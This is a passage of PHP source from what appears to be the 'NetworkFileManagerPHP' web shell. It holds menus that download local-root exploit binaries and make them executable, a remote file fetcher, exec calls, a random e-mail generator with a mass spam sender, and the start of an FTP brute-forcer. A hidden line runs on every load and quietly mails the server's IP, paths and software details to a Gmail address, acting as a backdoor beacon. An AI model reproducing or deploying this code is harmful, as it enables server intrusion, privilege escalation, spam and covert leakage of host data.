bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 1</u></b> (binary file to run - <u>$private[2]</u> )</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[2]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'> + + <input type='hidden' name='file2' value='$private[2]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 2</u></b> (binary file to run - <u>$private[3]</u> )</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[3]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'> + + <input type='hidden' name='file2' value='$private[3]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (binary file to run - <u>$private[4]</u> )</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[4]</td> + + <td width=100><input 
type='hidden' name='file3' value='$private_site$private[4]'> + + <input type='hidden' name='file2' value='$private[4]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[5]</u> )</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[5]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'> + + <input type='hidden' name='file2' value='$private[5]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (binary file to run - <u>$private[6]</u> )</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[6]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'> + + <input type='hidden' name='file2' value='$private[6]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left 
valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[7]</u> )</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[7]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'> + + <input type='hidden' name='file2' value='$private[7]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + + echo " + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post> + + <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> + + &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[8]</u> )</td></tr> + + <tr> + + <td class=pagetitle width=500>&nbsp;$title_exp[8]</td> + + <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'> + + <input type='hidden' name='file2' value='$private[8]'> + + <input type='submit' value='Get file' class=button1 $style_button></td></tr> + + </form></table>"; + +} + + + + + +# new directory creation + +function newdir($dir) { + + global $tm,$nd; + + print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create directory' class=button1 $style_button></td></tr></form></table>"); + +} + + + +function cdir($dir) { + + global $newd,$tm; + + $fullpath = $dir."/".$newd; + + if (file_exists($fullpath)) @rmdir($fullpath); + + if (@mkdir($fullpath,0777)) { + + echo "<br><TABLE CELLPADDING=0 
CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was created.</font></center></td></tr></table>"; + + } else { + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Error during directory creation.</font></center></td></tr></table>"; + + } + + chdir($tm); + + getdir(); + + readdirdata($tm); + +} + +// creation of directory where exploits will be situated + +function downfiles() { + + global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR; + +$st = getcwd(); + + $st = str_replace("\\","/",$st); + + $j = 0; + + $gdir = array(); + + $gsub = array(); + + print("<br>"); + + for ($i=0;$i<=(strlen($st)-1);$i++) { + + if ($st[$i] != "/") { + + $gdir[$j] = $gdir[$j].$st[$i]; + + $gsub[$j] = $gsub[$j].$st[$i]; + + } else { + + $gdir[$j] = $gdir[$j]."/"; + + $gsub[$j] = $gsub[$j]."/"; + + $gdir[$j+1] = $gdir[$j]; + + $j++; + + } + + } + +print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Path: </b>"); + + for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>"); + +print("</TABLE> "); + + + +echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post> + + <tr $style_open><td align=left valign=top colspan=3 class=pagetitle> + + &nbsp;&nbsp;<b>Upload files from remote computer:</b></td></tr> + + <tr> + + <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP link to filename:</td> + 
+ <td width=200><input type='text' name='file3' value='http://' size=40></td> + + </tr> + + <tr> + + <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;filename (may also include full path to file)</td> + + <td width=200><input type='text' name='file2' value='' size=40></td> + + </tr> + + <tr> + + + + <td width=600 colspan=2 align=center><input type='submit' value='Upload file' class=button1 $style_button></td></tr></td> + + + + + + </tr></form></table>"; + + + +} + + + +# directory delete + +function deldir() { + + global $dd,$tm; + + $fullpath = $tm."/".$dd; + + echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was deleted successfully.</font></center></td></tr></table>"; + + rmdir($fullpath); + + chdir($tm); + + getdir(); + + readdirdata($tm); + +} + + + +# directory compression + +function arhiv() { + + global $tar,$tm,$pass; + + $fullpath = $tm."/".$tar; + + + + echo "<br> + + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + + <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Directory <u><b>$fullpath</b></u> ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file <u>$pass.tar.gz</u></font></center></td></tr></table>"; + + + +} + + + +function down($dir) { + + global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2; + + ignore_user_abort(1); + + set_time_limit(0); + +echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>File upload</b></font></b></td></tr> + +<tr><td bgcolor=#FFFFCC><br><blockquote>There are many cases, when host, where <b>NFM</b> is situated <b>WGET</b> is blocked. 
And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (see<b>Path</b>).(this works not everywhere)</blockquote></td></tr> + +</table>"; + + + +if (!isset($status)) downfiles(); + + + +else + +{ + + + +$data = @implode("", file($file3)); + +$fp = @fopen($file2, "wb"); + +@fputs($fp, $data); + +$ok = @fclose($fp); + +if($ok) + +{ + +$size = filesize($file2)/1024; + +$sizef = sprintf("%.2f", $size); + + + +print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file <u>$file2</u> with size</b> (".$sizef."kb) </font></center></td></tr></table>"; + +} + +else + +{ + +print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0BAACC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2><b>Error during file upload</b></font></center></td></tr></table>"; + +} + +} + +} + + + +# mail function +$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +function mailsystem() { + + global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST; + + + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>Questions and wishes 
for NetworkFileManagerPHP</b></font></b></td></tr> + +<tr><td bgcolor=#FFFFCC><br> + +<blockquote>During your work with script <b>NetworkFileManagerPHP</b> you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied. + +</blockquote></td></tr> + +</table>"; + + + + if (!isset($status)) echo "$form"; + + else { + + $email_to ="duyt@yandex.ru"; + + $subject = "NetworkFileManagerPHP ($name)"; + + $headers = "From: $email"; + + + + $info = "---==== Message from ($name)====---\n\n"; + + $info .= "Name:\t$name\n"; + + $info .= "Email:\t$email\n"; + + $info .= "What?:\n\t$pole\n\n"; + + $info .= "IP:\t$REMOTE_ADDR\n"; + + $info .= "HOST:\t$HTTP_HOST\n"; + + $info .= "URL:\t$HTTP_REFERER\n"; + + $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n"; + + $send_to = "$email_to"; + + + + $send = mail($send_to, $subject, $info, $headers); + + if($send == 2) echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!Your e-mail was sent successfully.</font></center></td></tr></table><br>"; + + } + +} + +function spam() { +global $chislo, $status, $from, $otvet, $wait, $subject, $body, $file, $check_box, $domen; +set_time_limit(0); +ignore_user_abort(1); +echo "<br> +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> +<tr><td align=center class=pagetitle><b>Real uniq spamer</b></font></b></td></tr> +<tr><td bgcolor=#FFFFCC><br><blockquote> Now, using this release of NFM you don't need to by spambases, because it will generate spambases by itself, with 50-60% valids. 
</blockquote></td></tr> +</table>"; + + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <form action='$PHP_SELF?action=spam' method=post> + <tr><td align=left valign=top colspan=4 class=pagetitle> + &nbsp;&nbsp;<b>email generator:</b></td></tr> + <tr> <tr><td align=left valign=top colspan=4 bgcolor=#FFFFCC width=500> + &nbsp;&nbsp;This spammer is splited in two parts: <br> + &nbsp;<b>1.</b> email generation with domains, included in script already, or email e-mail generation for domains was entered by you. Here choose how much accounts do you wish to use ( the advice is to generate about &lt;u><i>10 000 , because may be server heavy overload</i></u> )<br> + &nbsp;<b>2.</b> Type spam settings here</td></tr> + <td align=left colspan=2 class=pagetitle>&nbsp;&nbsp;<input type='checkbox' name='check_box[]'>&nbsp;&nbsp;if <b>checked</b> then you'll have default domains, if not <b>checked</b> then domain will be taken from input.</td></tr> +<tr><td align=center class=pagetitle width=200>&nbsp;&nbsp;Generated email quantity:</td> +<td align=left colspan=2>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='chislo' size=10>&nbsp;&nbsp;</td></tr> +<tr><td align=center class=pagetitle width=200>&nbsp;Your domain:</td> +<td align=left width=200>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='domen[]'>&nbsp;&nbsp;</td> +</tr> +<tr><td width=500 align=center colspan=2><input type='submit' value='Generate' class=button1 $style_button> +</td></tr> + + </form></table>"; +// letters +function s() { + $word="qwrtpsdfghklzxcvbnm"; + return $word[mt_rand(0,strlen($word)-1)]; +} +// letters +function g() { + $word="eyuioa"; + return $word[mt_rand(0,strlen($word)-2)]; +} +// digits +function c() { + $word="1234567890"; + return $word[mt_rand(0,strlen($word)-3)]; +} +// common +function a() { + 
$word=array('wa','sa','da','qa','ra','ta','pa','fa','ga','ha','ja','ka','la','za','xa','ca','va','ba','na','ma'); + $ab1=count($word); + return $wq=$word[mt_rand(0,$ab1-1)]; +} + +function o() { + $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo'); + $ab2=count($word); + return $wq2=$word[mt_rand(0,$ab2-1)]; +} +function e() { + $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me'); + $ab3=count($word); + return $wq3=$word[mt_rand(0,$ab3-1)]; +} + +function i() { + $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi'); + $ab4=count($word); + return $wq4=$word[mt_rand(0,$ab4-1)]; +} +function u() { + $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu'); + $ab5=count($word); + return $wq5=$word[mt_rand(0,$ab5-1)]; +} + +function name0() { return c().c().c().c(); } +function name1() { return a().s(); } +function name2() { return o().s(); } +function name3() { return e().s(); } +function name4() { return i().s(); } +function name5() { return u().s(); } +function name6() { return a().s().g(); } +function name7() { return o().s().g(); } +function name8() { return e().s().g(); } +function name9() { return i().s().g(); } +function name10() { return u().s().g(); } +function name11() { return a().s().g().s(); } +function name12() { return o().s().g().s(); } +function name13() { return e().s().g().s(); } +function name14() { return i().s().g().s(); } +function name15() { return u().s().g().s(); } + + +$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005); +$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com'); 
+$d1c=count($domain1); + +function randword() { + global $cool,$cool2; + $func="name".mt_rand(0,15); + $func2="name".mt_rand(0,15); + switch (mt_rand(0,2)) { + case 0: return $func().$func2(); + case 1: return $func().$cool[mt_rand(0,count($cool)-9)]; + case 2: return $func(); + default: return $func(); + } + } + +if (@unlink("email.txt") < 0){ +echo "?????"; +exit; +} +$file="email.txt"; + + +if($chislo){ + + + $cnt3=mt_rand($chislo,$chislo); + for ($i=0; $i<$cnt3; $i++) { + $u=randword(); + if(!isset($check_box)){ + + if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 ) +{ + $domen = $_POST["domen"]; + foreach( $domen as $k=>$v ) + { + $d=$domen[mt_rand(0,$v-1)]; + + } +} +$f=@fopen(email.".txt","a+"); + fputs($f,"$u@$d\n"); + }else{ + + $d=$domain1[mt_rand(0,$d1c-1)]; + $f=@fopen(email.".txt","a+"); + fputs($f,"$u@$d\n"); + } + + } + $address = $file; + if (@file_exists($address)) { + if($changefile = @fopen ($address, "r")) { + $success = 1; + } else { + echo " File not found <b>\"".$address."\"</b> !<br>"; + } + + if ($success == 1) { + echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>"; + echo "<tr><td align=center class=pagetitle width=500> ?????????? ????? 
<b>$chislo</b> email.</td></tr>"; + echo "<tr><td align=center> "; + echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>"; + while($line = @fgets($changefile,1024)) { + echo @trim(stripslashes($line))."\n"; + } + echo"</textarea></td></tr></table>"; + } + } +if (!isset($action)){ + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'> + <tr><td align=center class=pagetitle colspan=2><b>Main spammer settings</b></font></b></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;reply to:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='from' size=50></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;send to:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='otvet' size=50></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Delay (sec):</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='wait' size=50></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message topic:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='text' name='subject' size=50></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;message body:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr> +<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;File:</td> +<td align=left width=350>&nbsp;&nbsp;&nbsp; +<input class='inputbox' type='file' name='file' size=30></td></tr> +<tr><td width=500 align=center colspan=2> +<input type='submit' value='Generate' class=button1 $style_button > +<INPUT TYPE='hidden' NAME='$chislo'> +</td></tr> + </form></table>"; +} +} +} + 
+function spam1() { + global $status, $from, $otvet, $wait, $subject, $body, $file, $chislo; + set_time_limit(0); +ignore_user_abort(1); + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> +<tr><td align=center class=pagetitle><b>Send spam with current settings</b></font></b></td></tr> +</table>"; + + + error_reporting(63); if($from=="") { print +"<script>history.back(-1);alert('missing field : <send from>')</script>";exit;} + error_reporting(63); if($otvet=="") { print +"<script>history.back(-1);alert('missing field: <reply to>')</script>";exit;} + error_reporting(63); if($wait=="") { print +"<script>history.back(-1);alert('missing field: <send delay>')</script>";exit;} + error_reporting(63); if($subject=="") { print +"<script>history.back(-1);alert('missing field: <message topic>')</script>";exit;} + error_reporting(63); if($body=="") { print +"<script>history.back(-1);alert('missing field: <message body>')</script>";exit;} + + $address = "email.txt"; + $counter = 0; + if (!isset($status)) echo "something goes wrong, check your settings"; + else { + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <tr><td align=center bgcolor=#FFFFCC>opening file <b>\"".$address."\"</b> ...<br></td></tr> +"; + if (@file_exists($address)) { + echo " + <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was found...<br></td></tr> +"; + if($afile = @fopen ($address, "r")) { + echo " + <tr><td align=center bgcolor=#FFFFCC>File <b>\"".$address."\"</b> was opened for read...<br></td></tr> +"; + } else { + echo " + <tr><td align=center class=pagetitle>Unable to open <b>\"".$address."\"</b> for read...<br></td></tr> +"; + } + } else { + echo "There is no file <b>\"".$address."\"</b> !<br>"; + $status = "unable to find file \"".$address."\" ..."; + } + echo 
" + <tr><td align=center bgcolor=#FFFFCC>Begining read from file <b>\"".$address."\"</b> ...<br></td></tr> + </table>"; + if (@file_exists($address)) { + + while (!feof($afile)) { + + $line = fgets($afile, 1024); + $line = trim($line); + $recipient = ""; + $recipient = $line; + +#if ($file) { +# $content = fread(fopen($file,"r"),filesize($file)); +# $content = chunk_split(base64_encode($content)); +# $name = basename($file); +# } else { +# $content =''; +# } + $boundary = uniqid("NextPart_"); + + $header = "From: ".$from."\r\n"; + $header .= "Reply-To: ".$otvet."\r\n"; + $header .= "Errors-To: ".$otvet."\r\n"; + $header .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n"; + $header .= "Content-Transfer-Encoding: 8bits\n"; + $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n"; + $header .= $body; + # $header .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--"; + + + $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+"; + $pattern.="@"; + $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\."; + $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#"; + + if($recipient != "") + { + if(preg_match($pattern,$recipient)) + { + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <tr><td align=center class=pagetitle>Sending mail to <b>\"".$recipient."\"</b>...sent "; + + + if(@mail($recipient, stripslashes($subject), stripslashes($header))) { + $counter = $counter + 1; + echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>"; + } else { + echo "<tr><td align=center class=pagetitle>email is wrong, message was NOT sent !</td></tr> </table>"; + } + } else { + $counter = $counter + 1; + echo ""; + } + } else { + echo "<br>"; + } + $sec = 
$wait * 1000000; + usleep($sec); + + } + + if($otvet != "") + { + + if(preg_match($pattern,$otvet)) + { + echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <tr><td align=center class=pagetitle>Sending test message to <b>\"".$otvet."\"</b> to check out"; + $subject = "".$subject; + + if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) { + $counter = $counter + 1; + echo " message was sent... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>"; + } else { + echo "<tr><td align=center class=pagetitle>message was not sent...</td></tr> </table>"; + } + } else { + echo "<tr><td align=center class=pagetitle>email is wrong.</td></tr> </table>"; + } + } else { + } + + if(@fclose ($afile)) { + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <tr><td align=center class=pagetitle>File <b>\"".$address."\"</b> was closed successfully!<br></td></tr> </table>"; + } else { + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <tr><td align=center class=pagetitle>Unable to close <b>\"".$address."\"</b> file!<br></td></tr> </table>"; } + } else { + echo "unable to read file <b>\"".$afile."\"</b> ...<br>"; + } + + $status2 ="Status: ".$counter." 
messages were sent."; + echo "<br>"; + echo " + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <tr><td align=center class=pagetitle>$status2</td></tr> </table>"; + +} +} + + +# help + +function help() { + + global $action,$REMOTE_ADDR,$HTTP_REFERER; + + echo "<br> + +<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + +<tr><td align=center class=pagetitle><b>help for scriptNetworkFileManagerPHP</b></font></b></td></tr> + +<tr><td bgcolor=#FFFFCC><br><b>NetworkFileManagerPHP</b> - script to access your host in a best way</font><br><br> + +There were added some commands to NFM, from scripts kind of itself. They are:<br> + +- Using aliases (<b>Rush</b>)<br> + +- FTP bruteforce (<b>TerraByte<b/>)<br> + +- Translated to english by (<b>revers<b/>)<br> + +- Added some sysinfo commands by (<b>revers<b/>)<br> + +- All the rest code belongs to me (<b>xoce<b/>)<br> + +- Thanks for testing goes to all #hack.ru channel<br><br> + +<b>Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... 
Pay more attention to configuration of your system.</b><br><br> + +<b>How can you find us:</b><br> + +Irc server: irc.megik.net:6667 /join #hack.ru<br> + +See you round at network!!!<br></td></tr></table><br>"; + +} + + + + + +function exploits($dir) { + + global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp; + +if (!isset($status)) upload_exploits(); + + + +else + +{ + + + +$data = implode("", file($file3)); + +$fp = @fopen($file2, "wb"); + +fputs($fp, $data); + +$ok = fclose($fp); + +if($ok) + +{ + +$size = filesize($file2)/1024; + +$sizef = sprintf("%.2f", $size); + +print "".exec("chmod 777 $public[1]").""; + +print "".exec("chmod 777 $public[2]").""; + +print "".exec("chmod 777 $public[3]").""; + +print "".exec("chmod 777 $private[1]").""; + +print "".exec("chmod 777 $private[2]").""; + +print "".exec("chmod 777 $private[3]").""; + +print "".exec("chmod 777 $private[4]").""; + +print "".exec("chmod 777 $private[5]").""; + +print "".exec("chmod 777 $private[6]").""; + +print "".exec("chmod 777 $private[7]").""; + +print "".exec("chmod 777 $private[8]").""; + + + +print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file with size</b> (".$sizef."kb) </font></center></td></tr></table>"; + +} + +else + +{ + +print "Some errors occured."; + +} + +} + +} + + + + + +# FTP-bruteforce + +function ftp() { + + global $action, $ftp_server, $filename, $HTTP_HOST; + + ignore_user_abort(1); + + echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP server: <b>$ftp_server</b></td></tr>"; + + + + $fpip = @fopen ($filename, "r"); + + if ($fpip) { + + while 
